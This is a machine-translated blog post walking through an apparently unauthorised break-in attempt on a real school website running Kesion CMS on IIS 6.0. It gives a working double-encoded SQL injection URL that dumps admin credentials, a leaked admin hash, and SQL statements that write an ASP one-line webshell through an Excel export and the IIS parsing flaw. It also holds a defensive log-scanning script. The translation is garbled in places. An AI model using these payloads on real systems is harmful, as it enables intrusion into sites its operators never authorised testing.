A post-'00 "bai fu mei" school: a hacker's penetration walkthrough

Source: Internet
Author: User
Tags mailbox subscription

The cause is very simple. Why did I receive this message in my QQ mailbox subscription?

A post-'00 "bai fu mei" asked: "Why can't the '90s generation find a partner?"

They opened the school.

XX Lab School... (We are here in the spirit of learning; the whole process is redacted.)

Baidu zhi''

The website is www.****.cn



IIS/6.0

The website generates static pages...

Let's look at the admin backend....

The backend has been modified from a CMS... so which CMS is it?

It is Kesion (kexun) CMS... How do we know? Because

appending 8 to the backend path shows the original interface.

Now that we know it's Kesion, we can make better use of that.

Search Baidu for Kesion vulnerabilities

A vulnerability submitted to WooYun

Haha RP

Submission time:

Public Date:

Specific: http://www.bkjia.com/Article/201207/139333.html

Injection statement: % ') union select 1, 2, username +' | '+ password from KS_Admin
The conversion is as follows:
/Plus/ajaxs. asp? Action = GetRelativeItem & key = search % 2525% 2527% 2529% 2520% 2575% 256e % 2569% 256f % 256e % 2520% 2573% 2565% 256c % 2565% 2563% 2574% 2520% 2531% 252c % 2532% 252c % 2575% 2573% 2565% 2572% 256e % 2561% 256d % 2565% 252b % 2527% 257c % 2527% 252b % 2570% 2561% 2573% 2573% 256f % 2577% 2572% 2564% 2520% 2566% 2572% 256f % 256d % 2520% 254b % 2553% 255f % 2541% 256d % 2564% maid % 2500

This query retrieves the admin account and password.

That shows the encoded form, but some people may not know how the encoding is done....

In fact, this is double encoding.

First encoding

union becomes %75%6E%69%6F%6E after URL-encoding.

Second encoding

For the second pass we URL-encode again, using GB2312 URLEncode.

%75%6E%69%6F%6E becomes %2575%256E%2569%256F%256E after the second encoding.

In this way, you should understand how to convert back and forth ~
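To show the double encoding from the defender's side, here is an added example (not code from the original writeup or from Kesion) that decodes the cs-uri-query field of IIS W3C log lines layer by layer, counts how many percent-encoding layers were stripped, and flags requests that were double-encoded or that contain SQL keywords once fully decoded. The log lines, the field order and the /Plus/ajaxs.asp request are constructed for the example.

```python
# Added example (not from the original writeup): detect double-percent-encoded
# requests, like the Kesion /Plus/ajaxs.asp injection described above, by
# decoding an IIS W3C log's cs-uri-query field until it stops changing.
# The log lines below are constructed, not real server data.
import re
from urllib.parse import unquote

# Keywords worth flagging once the request has been fully decoded.
SQL_PATTERN = re.compile(
    r"(union\s+select|select\s+.+?\s+from|into\s+\[|drop\s+table|create\s+table)",
    re.IGNORECASE,
)


def decode_layers(value: str, max_layers: int = 4):
    """Percent-decode repeatedly (GB2312, as the writeup describes) until the
    text stops changing. Returns (decoded_text, layers_removed)."""
    current, layers = value, 0
    while layers < max_layers:
        decoded = unquote(current, encoding="gb2312", errors="replace")
        if decoded == current:
            break
        current, layers = decoded, layers + 1
    return current, layers


def inspect_query(query: str) -> dict:
    """Classify one query string: how many encoding layers it carried, whether
    it was double-encoded (a filter that decodes only once would miss it), and
    any SQL keyword visible after full decoding."""
    decoded, layers = decode_layers(query)
    match = SQL_PATTERN.search(decoded)
    return {
        "layers": layers,
        "double_encoded": layers >= 2,
        "decoded": decoded,
        "suspicious": match is not None or layers >= 2,
        "keyword": match.group(0) if match else None,
    }


def scan_iis_log(lines):
    """Parse W3C lines of the assumed form
    'date time c-ip cs-method cs-uri-stem cs-uri-query sc-status'
    and return the suspicious requests with their decoded query."""
    hits = []
    for line in lines:
        if line.startswith("#"):          # skip W3C header lines
            continue
        fields = line.split()
        if len(fields) < 7:
            continue
        verdict = inspect_query(fields[5])
        if verdict["suspicious"]:
            hits.append({"time": f"{fields[0]} {fields[1]}", "client": fields[2],
                         "uri": fields[4], **verdict})
    return hits


# Constructed sample log: one benign request, one double-encoded "') union select 1,2".
LOG_LINES = [
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2012-07-15 10:21:03 10.0.0.5 GET /Plus/ajaxs.asp Action=GetRelativeItem&key=news 200",
    "2012-07-15 10:21:09 10.0.0.5 GET /Plus/ajaxs.asp "
    "Action=GetRelativeItem&key=search%2527%2529%2520%2575%256e%2569%256f%256e"
    "%2520%2573%2565%256c%2565%2563%2574%2520%2531%252c%2532 200",
]

if __name__ == "__main__":
    for hit in scan_iis_log(LOG_LINES):
        print(f"{hit['time']} {hit['client']} {hit['uri']} "
              f"layers={hit['layers']} keyword={hit['keyword']!r}")
        print("   decoded:", hit["decoded"])
```

The point of the loop is that a filter which decodes once sees only %75%6E%69%6F%6E and no keyword; decoding until the string is stable recovers the real statement, and the layer count alone is a useful signal because ordinary clients almost never send double-encoded parameters.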

Now we have the account and password, but not the authentication code.

<option value='1|2'>admin|8ae2232b1cd2bd90</option>

The authentication code is stored in the Conn.asp file.

We would need to read that file.

In other words, having the account and password alone still gets us nowhere.

----------------------------------------------------------------------------------------

Registration on the main site is disabled.

The BBS also forbids registration.

The BBS backend is Dvbbs.net.

Online forums...

Ah ah

The administrator has also blocked downloads of files with the .mdb suffix.

It seems the administrator knows something about management...

We waited on the main site for a long time...

Remember the address we just found?

Why didn't I start from there?

Dumb

The defaults, you all understand.

Let's see what we see...

We went in.

Now for the shell.

There is no drama to directly launch the project.

Because all the stations on this server are smart, you know it!

On Kesion 8.0, getting a shell is done through SQL statements.

Normally

Run the Code:
1. create table cmd (a varchar (50 ))
2. insert into cmd (a) values ('<% execute request (chr (35) %> ')
3. select * into [a] in 'd: \ wwwroot \ m3loee.asa).xls ''excel 4.0;' from cmd;
4. drop table cmd;
Explanation:
1. create table cmd (a varchar (50 )) creates a table named cmd with a single field a of type varchar, length 50 characters.
2. insert into cmd (a) values ('<% execute request (chr (35) %> ') inserts a one-line ASP shell with the password # into field a of table cmd.
3. select * into [a] in 'd: \ wwwroot \ m3loee.asa).xls ''excel 4.0;' from cmd exports the contents of the cmd table to an Excel file at the physical path. Excel is used because an Access database cannot export to other, more dangerous formats; once exported, the IIS parsing vulnerability turns the file into our small webshell.
4. drop table cmd deletes the table.

But when executing the third statement... a problem.

We're stuck.

Another variant is simpler.

SELECT '<% execute request ("a") %>' into [0 ldgui] in 'd: \ wwwroot \ ***** \ wwwroot \ 8 + 1.asp( 1.asp) 'excel 8.0; 'from 0 ldgui

The database is read-only:

Error code: -2147217911
Source: Microsoft JET Database Engine
Description: Cannot be updated. The database or object is read-only.
Help: 5003027

It seems a shell cannot be obtained through the backend.

Even with the target site's authentication code, we cannot get a shell from the backend.

Nor can privileges be escalated from a neighboring site on the same server.

Full path of the main database: D:\wwwroot\***\wwwroot\8\KS_Data\KesionCMS8.mdb
Full path of the collection database: D:\wwwroot\***\wwwroot\KS_Data\Collect\KS_Collect.Mdb

The gurus at 90sec may be able to exploit the Kesion vulnerability.

However, there is no PHP environment installed on my local machine.

We have to note that...

There is still hope for one of the 134 sites....

Let's talk about the process of getting a shell from the backend.

The backend has a backup function, but no upload.

Without upload, how do we get an image in?

No database; it turns out to be asp.

We add an encrypted one-line shell in the backend.

Then back up the website.

That's the idea.

However, the site's permissions are locked down tight and there is no way through.

Nothing can be uploaded to the site.

Uploading a webshell triggers firewall interception.

The neighboring sites are also a dead end.

The website data permission is read-only. I guess even if we got the authentication code we couldn't get a shell.
